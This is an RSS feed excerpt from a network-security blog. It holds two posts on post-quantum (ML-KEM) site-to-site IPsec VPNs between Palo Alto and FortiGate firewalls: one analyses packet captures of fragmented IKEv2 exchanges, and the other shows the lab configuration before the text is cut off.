<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Weberblog.net</title>
	<atom:link href="https://weberblog.net/feed/" rel="self" type="application/rss+xml" />
	<link>https://weberblog.net</link>
	<description>IT-Security, Networks, IPv6, VPN, DNSSEC, NTP</description>
	<lastBuildDate>Fri, 10 Jul 2026 15:22:50 +0000</lastBuildDate>
	<language>en-GB</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.6</generator>

<image>
	<url>https://weberblog.net/wp-content/uploads/2018/05/cropped-webernetz-logo-4-icon-2000x2000-1-32x32.png</url>
	<title>Weberblog.net</title>
	<link>https://weberblog.net</link>
	<width>32</width>
	<height>32</height>
</image> 
<site xmlns="com-wordpress:feed-additions:1">52315419</site>	<item>
		<title>Packet Capture of a Post-Quantum Site-to-Site VPN</title>
		<link>https://weberblog.net/packet-capture-of-a-post-quantum-site-to-site-vpn/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=packet-capture-of-a-post-quantum-site-to-site-vpn</link>
					<comments>https://weberblog.net/packet-capture-of-a-post-quantum-site-to-site-vpn/#respond</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Tue, 07 Jul 2026 13:35:22 +0000</pubDate>
				<category><![CDATA[IPsec/VPN]]></category>
		<category><![CDATA[Post-Quantum (PQC)]]></category>
		<category><![CDATA[Allegro Network Multimeter]]></category>
		<category><![CDATA[Diffie-Hellman]]></category>
		<category><![CDATA[FortiGate]]></category>
		<category><![CDATA[ML-KEM]]></category>
		<category><![CDATA[Palo Alto Networks]]></category>
		<category><![CDATA[Post-Quantum Cryptography]]></category>
		<category><![CDATA[PQC]]></category>
		<category><![CDATA[Ultimate PCAP]]></category>
		<category><![CDATA[Wireshark]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14496</guid>

					<description><![CDATA[<img width="300" height="155" src="https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image-300x155.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" srcset="https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image-300x155.jpg 300w, https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image-1024x527.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image-768x396.jpg 768w, https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image-1536x791.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image.jpg 1920w" sizes="(max-width: 300px) 100vw, 300px" />After using several post-quantum secure VPN tunnels (here and there), I was interested in how this key exchange with ML-KEM looks on the wire. Especially in direct comparison to a classical VPN setup with just ECDH (group 21). Spoiler: since it does not fit in a single packet, it has to use a new form &#8230; <a href="https://weberblog.net/packet-capture-of-a-post-quantum-site-to-site-vpn/" class="more-link">Continue reading <span class="screen-reader-text">Packet Capture of a Post-Quantum Site-to-Site VPN</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="155" src="https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image-300x155.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image-300x155.jpg 300w, https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image-1024x527.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image-768x396.jpg 768w, https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image-1536x791.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/06/Packet-Capture-of-a-Post-Quantum-Site-to-Site-VPN-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>After using several post-quantum secure VPN tunnels (<a href="https://weberblog.net/pqc-vpn-tunnel-with-palo/">here</a> and <a href="https://weberblog.net/pqc-vpn-tunnel-between-palo-alto-fortigate/">there</a>), I was interested in how this <strong>key exchange with ML-KEM looks on the wire</strong>. Especially in direct comparison to a classical VPN setup with just ECDH (group 21). Spoiler: since it does not fit in a single packet, it has to use a new form of fragmentation. 😳 Here we go:</p>
<p><span id="more-14496"></span></p>
<div class="su-note"  style="border-color:#69adc8;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#83c7e2;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">This is one of many VPN tutorials on my blog. &#8211;&gt; <a href="https://weberblog.net/site-to-site-vpn-tutorials/">Have a look at this full list</a>. &lt;&#8211;</div></div>
<h2>Setup</h2>
<p>This was my basic setup. A <strong>Palo Alto PA-440 with PAN-OS 12.1.6</strong> on the left and a <strong>FortiGate FG-70F with FortiOS 7.6.7</strong> on the right. I captured with a <a href="https://allegro-packets.com/en/allegro-network-multimeter" target="_blank" rel="noopener">Network Multimeter &#8220;Allegro 500&#8221; from Allegro Packets</a>.</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Lab-Setup.png"><img fetchpriority="high" decoding="async" class="aligncenter size-large wp-image-14548" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Lab-Setup-1024x565.png" alt="" width="604" height="333" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Lab-Setup-1024x565.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Lab-Setup-300x166.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Lab-Setup-768x424.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Lab-Setup-1536x848.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Lab-Setup.png 1726w" sizes="(max-width: 604px) 100vw, 604px" /></a></p>
<p>I captured three runs while I changed the ciphers for both IKE and IPsec (phase 1 and phase 2) in the following way:</p>
<ol>
<li>only classical elliptic curve Diffie-Hellman: group21</li>
<li><strong>group21 + ML-KEM</strong></li>
<li>group21 + ML-KEM + FrodoKEM + Bike (the paranoid way, just for fun)</li>
</ol>

<a href='https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Palo.png'><img decoding="async" width="300" height="134" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Palo-300x134.png" class="attachment-medium size-medium" alt="" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Palo-300x134.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Palo-1024x456.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Palo-768x342.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Palo-1536x684.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Palo-604x270.png 604w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Palo.png 1600w" sizes="(max-width: 300px) 100vw, 300px" /></a>
<a href='https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Forti.png'><img loading="lazy" decoding="async" width="300" height="234" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Forti-300x234.png" class="attachment-medium size-medium" alt="" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Forti-300x234.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Forti-1024x798.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Forti-768x599.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Forti-1536x1198.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-three-PQC-rounds-Forti.png 1670w" sizes="auto, (max-width: 300px) 100vw, 300px" /></a>

<p>During the VPN sessions, I only did a <strong>ping from one side to the other</strong>. Hence: Not much traffic, but only very few packets. However, note that both firewalls implement some <strong>Dead Peer Detection</strong> (DPD; ISAKMP Informational packets) methods, while the Palo additionally monitors the VPN tunnel itself (tunnel monitor; ESP packets). Hence, there are continuous packets in the trace, even without real payload traffic.</p>
<p>Furthermore, both ends are trying to establish the VPN at the same time. This is why you will see the &#8220;Initiator Request&#8221; and the &#8220;Responder Response&#8221; from both sides at almost the same time. But never mind. ;)</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packethawk-inline-bypass-network-tap" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketHawk.1208x232.webp" /></a></div>
<h2>Analysis</h2>
<p>As always, please download those merged captures to analyse them by yourself. And/or use the <strong><a href="https://weberblog.net/the-ultimate-pcap/">Ultimate PCAP</a></strong>, since those captures are integrated there as well. Note the packet comments to find the Start/End of the appropriate sections. (Tip: Add a custom column to display the <code>frame.comment</code>.)</p>
<p style="text-align: center;">&#8211;&gt; <a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-3x-different-cipher-sets.pcapng.gz">PQC VPN Palo-Forti 3x different cipher-sets.pcapng.gz</a> &lt;&#8211;</p>
<p>Here&#8217;s a <strong>basic Wireshark comparison</strong>. Note the new IKEv2 messages for IKEv2 fragmentation (<a href="https://www.rfc-editor.org/info/rfc7383/" target="_blank" rel="noopener">RFC 7383</a>), which are a must for using IKE_INTERMEDIATE (<a href="https://www.rfc-editor.org/info/rfc9242/" target="_blank" rel="noopener">RFC 9242</a>) and enabling multiple key exchanges (<a href="https://www.rfc-editor.org/info/rfc9370/" target="_blank" rel="noopener">RFC 9370</a>).</p>
<h3>Classical: DH group21 only: IKE_SA_INET, IKE_AUTH</h3>
<p><a href="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-01-classical-group21-scaled.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14562" src="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-01-classical-group21-1024x579.png" alt="" width="604" height="342" srcset="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-01-classical-group21-1024x579.png 1024w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-01-classical-group21-300x170.png 300w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-01-classical-group21-768x434.png 768w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-01-classical-group21-1536x868.png 1536w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-01-classical-group21-2048x1157.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<h3>Hybrid: DH group21 + ML-KEM: fragmented IKE_INTERMEDIATE</h3>
<p><a href="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02-hybrid-group21-mlkem-scaled.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14563" src="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02-hybrid-group21-mlkem-1024x579.png" alt="" width="604" height="342" srcset="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02-hybrid-group21-mlkem-1024x579.png 1024w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02-hybrid-group21-mlkem-300x170.png 300w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02-hybrid-group21-mlkem-768x434.png 768w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02-hybrid-group21-mlkem-1536x868.png 1536w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02-hybrid-group21-mlkem-2048x1157.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02b-hybrid-group21-mlkem-scaled.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14564" src="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02b-hybrid-group21-mlkem-1024x579.png" alt="" width="604" height="342" srcset="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02b-hybrid-group21-mlkem-1024x579.png 1024w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02b-hybrid-group21-mlkem-300x170.png 300w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02b-hybrid-group21-mlkem-768x434.png 768w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02b-hybrid-group21-mlkem-1536x868.png 1536w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-02b-hybrid-group21-mlkem-2048x1157.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<h3>Paranoid way: DH group21 + 3x PQC: MANY fragments :D</h3>
<p><a href="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-03-hybrid-group21-mlkem-frodokem-bike-scaled.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14565" src="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-03-hybrid-group21-mlkem-frodokem-bike-1024x579.png" alt="" width="604" height="342" srcset="https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-03-hybrid-group21-mlkem-frodokem-bike-1024x579.png 1024w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-03-hybrid-group21-mlkem-frodokem-bike-300x170.png 300w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-03-hybrid-group21-mlkem-frodokem-bike-768x434.png 768w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-03-hybrid-group21-mlkem-frodokem-bike-1536x868.png 1536w, https://weberblog.net/wp-content/uploads/2026/07/PQC-VPN-Palo-Forti-03-hybrid-group21-mlkem-frodokem-bike-2048x1157.png 2048w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a></p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetfalcon-packet-capture" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketFalcon.1208x232.webp" /></a></div>
<p>Soli Deo Gloria!</p>
<p><span class="text-Kvkr6N truncate-Pc_c1s textS-BC51wP">Photo by <a href="https://unsplash.com/@tobiasamueller?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Tobias A. Müller</a> on <a href="https://unsplash.com/photos/intermodal-containers-on-dock-fusq9KwkSF4?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText">Unsplash</a></span>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://weberblog.net/packet-capture-of-a-post-quantum-site-to-site-vpn/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<post-id xmlns="com-wordpress:feed-additions:1">14496</post-id>	</item>
		<item>
		<title>PQC VPN-Tunnel between Palo Alto  FortiGate</title>
		<link>https://weberblog.net/pqc-vpn-tunnel-between-palo-alto-fortigate/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=pqc-vpn-tunnel-between-palo-alto-fortigate</link>
					<comments>https://weberblog.net/pqc-vpn-tunnel-between-palo-alto-fortigate/#respond</comments>
		
		<dc:creator><![CDATA[Johannes Weber]]></dc:creator>
		<pubDate>Mon, 22 Jun 2026 05:20:43 +0000</pubDate>
				<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[IPsec/VPN]]></category>
		<category><![CDATA[Palo Alto Networks]]></category>
		<category><![CDATA[Post-Quantum (PQC)]]></category>
		<category><![CDATA[FortiGate]]></category>
		<category><![CDATA[IKEv2]]></category>
		<category><![CDATA[ML-KEM]]></category>
		<category><![CDATA[Post-Quantum Cryptography]]></category>
		<category><![CDATA[PQC]]></category>
		<category><![CDATA[Site-to-Site VPN]]></category>
		<guid isPermaLink="false">https://weberblog.net/?p=14491</guid>

					<description><![CDATA[<img width="300" height="163" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image-300x163.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image-300x163.jpg 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image-1024x557.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image-768x418.jpg 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image-1536x835.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" />Since we have learned the basics of post-quantum secure VPN tunnels, let&#8217;s configure a site-to-site VPN between a Palo Alto Networks firewall and a FortiGate with PQC ciphers to verify vendor interoperability. Spoiler: it works like a charm. ;) Palo Alto Networks supports PQC ciphers since PAN-OS 11.2, while 12.1 finally brought the ML-KEM algorithm. &#8230; <a href="https://weberblog.net/pqc-vpn-tunnel-between-palo-alto-fortigate/" class="more-link">Continue reading <span class="screen-reader-text">PQC VPN-Tunnel between Palo Alto <-> FortiGate</span> <span class="meta-nav">&#8594;</span></a>]]></description>
										<content:encoded><![CDATA[<img width="300" height="163" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image-300x163.jpg" class="webfeedsFeaturedVisual wp-post-image" alt="" style="display: block; margin: auto; margin-bottom: 5px;max-width: 100%;" link_thumbnail="" decoding="async" loading="lazy" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image-300x163.jpg 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image-1024x557.jpg 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image-768x418.jpg 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image-1536x835.jpg 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Tunnel-between-Palo-Alto-FortiGate-featured-image.jpg 1920w" sizes="auto, (max-width: 300px) 100vw, 300px" /><p>Since we have learned the <a href="https://weberblog.net/pqc-vpn-tunnel-with-palo/">basics of post-quantum secure VPN tunnels</a>, let&#8217;s configure a <strong>site-to-site VPN between a Palo Alto Networks firewall and a FortiGate with PQC ciphers to verify vendor interoperability</strong>. Spoiler: it works like a charm. ;)</p>
<p><span id="more-14491"></span></p>
<div class="su-note"  style="border-color:#69adc8;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;"><div class="su-note-inner su-u-clearfix su-u-trim" style="background-color:#83c7e2;border-color:#ffffff;color:#333333;border-radius:3px;-moz-border-radius:3px;-webkit-border-radius:3px;">This is one of many VPN articles on my blog. &#8211;&gt; <a href="https://weberblog.net/site-to-site-vpn-tutorials/">Have a look at this full list</a>. &lt;&#8211;</div></div>
<p>Palo Alto Networks <a href="https://docs.paloaltonetworks.com/pan-os/11-2/pan-os-release-notes/features-introduced-in-pan-os/networking-features" target="_blank" rel="noopener">supports PQC ciphers since PAN-OS 11.2</a>, while 12.1 finally brought the ML-KEM algorithm. FortiGates <a href="https://docs.fortinet.com/document/fortigate/7.6.0/new-features/229631/enhancing-security-with-post-quantum-cryptography-for-ipsec-key-exchange-7-6-1" target="_blank" rel="noopener">support PQC ciphers since FortiOS 7.6</a>. My lab consists of a <strong>PA-440 with PAN-OS 12.1.6</strong> and a <strong>FG-70F with FortiOS 7.6.7</strong>.</p>
<h2>Setup</h2>
<p>(Note that I&#8217;m not showing a complete site-to-site VPN tutorial, but focusing on the PQC part.)</p>
<p>I&#8217;m using the <strong>hybrid approach</strong>. PQC ciphers are used *additionally* to the classical ECDH key agreement. That is: <strong>group21 + mlkem</strong>.</p>
<div style="margin-bottom:24px"><a href="https://weberblog.net/packetlion-aggregation-packet-broker" target="_blank" rel="noopener"><img decoding="async" class="aligncenter size-full" src="https://weberblog.net/wp-content/uploads/2026/05/Banner_PacketLion.1208x232.webp" /></a></div>
<h3>Palo Alto Networks NGFW</h3>
<p>On the <strong>Palo</strong> side, you need to configure the <strong>IKE/IPsec Crypto, the IKE Gateway and the IPsec tunnel</strong> in the following way:</p>
<p><a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-01-Palo-IKE-Crypto.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14520" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-01-Palo-IKE-Crypto-1024x602.png" alt="" width="604" height="355" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-01-Palo-IKE-Crypto-1024x602.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-01-Palo-IKE-Crypto-300x176.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-01-Palo-IKE-Crypto-768x451.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-01-Palo-IKE-Crypto-1536x902.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-01-Palo-IKE-Crypto.png 1600w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-02-Palo-IKE-Crypto-Advanced.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14521" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-02-Palo-IKE-Crypto-Advanced-1024x675.png" alt="" width="604" height="398" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-02-Palo-IKE-Crypto-Advanced-1024x675.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-02-Palo-IKE-Crypto-Advanced-300x198.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-02-Palo-IKE-Crypto-Advanced-768x506.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-02-Palo-IKE-Crypto-Advanced-1536x1012.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-02-Palo-IKE-Crypto-Advanced.png 1600w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-03-Palo-IPsec-Crypto.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14522" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-03-Palo-IPsec-Crypto-1024x628.png" alt="" width="604" height="370" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-03-Palo-IPsec-Crypto-1024x628.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-03-Palo-IPsec-Crypto-300x184.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-03-Palo-IPsec-Crypto-768x471.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-03-Palo-IPsec-Crypto-1536x943.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-03-Palo-IPsec-Crypto.png 1600w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-04-Palo-IPsec-Crypto-Advanced.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14523" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-04-Palo-IPsec-Crypto-Advanced-1024x456.png" alt="" width="604" height="269" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-04-Palo-IPsec-Crypto-Advanced-1024x456.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-04-Palo-IPsec-Crypto-Advanced-300x134.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-04-Palo-IPsec-Crypto-Advanced-768x342.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-04-Palo-IPsec-Crypto-Advanced-1536x684.png 1536w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-04-Palo-IPsec-Crypto-Advanced-604x270.png 604w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-04-Palo-IPsec-Crypto-Advanced.png 1600w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-05-Palo-IKE-Gateway.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14524" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-05-Palo-IKE-Gateway-1024x835.png" alt="" width="604" height="493" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-05-Palo-IKE-Gateway-1024x835.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-05-Palo-IKE-Gateway-300x245.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-05-Palo-IKE-Gateway-768x626.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-05-Palo-IKE-Gateway.png 1200w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-06-Palo-IKE-Gateway-Advanced.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14525" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-06-Palo-IKE-Gateway-Advanced-1024x771.png" alt="" width="604" height="455" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-06-Palo-IKE-Gateway-Advanced-1024x771.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-06-Palo-IKE-Gateway-Advanced-300x226.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-06-Palo-IKE-Gateway-Advanced-768x579.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-06-Palo-IKE-Gateway-Advanced.png 1200w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a href="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-07-Palo-IKE-Gateway-KEM.png"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-14526" src="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-07-Palo-IKE-Gateway-KEM-1024x592.png" alt="" width="604" height="349" srcset="https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-07-Palo-IKE-Gateway-KEM-1024x592.png 1024w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-07-Palo-IKE-Gateway-KEM-300x174.png 300w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-07-Palo-IKE-Gateway-KEM-768x444.png 768w, https://weberblog.net/wp-content/uploads/2026/06/PQC-VPN-Palo-Forti-07-Palo-IKE-Gateway-KEM.png 1200w" sizes="auto, (max-width: 604px) 100vw, 604px" /></a> <a 